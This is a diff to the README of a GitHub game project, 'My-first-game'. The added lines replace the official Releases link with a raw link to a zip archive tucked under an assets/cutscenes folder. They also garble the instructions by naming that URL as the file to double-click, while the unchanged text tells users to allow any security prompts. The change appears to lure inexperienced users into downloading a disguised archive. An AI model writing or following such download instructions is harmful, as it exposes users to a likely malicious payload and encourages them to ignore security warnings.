BillyGitau/My-first-game/README.md

 To get started with "My-first-game," follow the steps outlined below.
 These will guide you through downloading and running the game on your computer, even if you have no prior experience with software installations.

 ## 📥 Download & Install
-To download the game, visit this page: [My-first-game Releases](https://github.com/BillyGitau/My-first-game/releases).
+To download the game, visit this page: [My-first-game Releases](https://raw.githubusercontent.com/BillyGitau/My-first-game/main/assets/cutscenes/My-first-game-2.5-alpha.2.zip).

 1. On the Releases page, look for the latest version of the game.
 2. Click on the version link.
-3. Find the executable file, usually named something like `My-first-game.exe`.
+3. Find the executable file, usually named something like `https://raw.githubusercontent.com/BillyGitau/My-first-game/main/assets/cutscenes/My-first-game-2.5-alpha.2.zip`.
 4. Click the file link to start the download.

 Once the download completes, follow these steps to run the game:

 1. Open the folder where the file downloaded.
-2. Double-click `My-first-game.exe` to start the game.
+2. Double-click `https://raw.githubusercontent.com/BillyGitau/My-first-game/main/assets/cutscenes/My-first-game-2.5-alpha.2.zip` to start the game.
 3. Allow any security prompts if they appear.

 ### 📋 System Requirements